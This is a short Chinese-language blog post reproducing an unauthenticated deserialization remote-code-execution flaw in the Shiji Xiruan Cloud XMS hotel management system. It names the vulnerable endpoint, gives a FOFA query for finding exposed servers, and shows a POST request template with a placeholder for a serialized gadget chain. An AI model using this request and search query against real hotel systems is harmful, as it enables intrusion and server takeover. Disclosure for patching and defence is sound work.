西软云XMS 反序列化RCE

产品简介

西软云XMS是基于云平台数据中心开发的支持多酒店、多语言、多平台的酒店管理系统。致力于以新一代云架构为国内四,五星级中高端酒店提供灵活、高度整合酒店业务,助力酒店智能转型升级。

漏洞概述

西软云XMS /fox-invoker/FoxLookupInvoker接口处存在反序列化漏洞,未经身份认证的攻击者可利用此漏洞执行任意代码,获取服务器权限。

影响范围

所有版本

复现环境

FOFA语法:

app="shiji-西软云XMS

漏洞复现

PoC

POST /fox-invoker/FoxLookupInvoker/?return-exception=true HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Connection: close
 
{{hexdec(cb18x的序列化链)}}

2023-12-29T18:32:44.png

2023-12-29T18:35:02.png

© 版权声明
THE END
喜欢就支持一下吧
点赞5 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容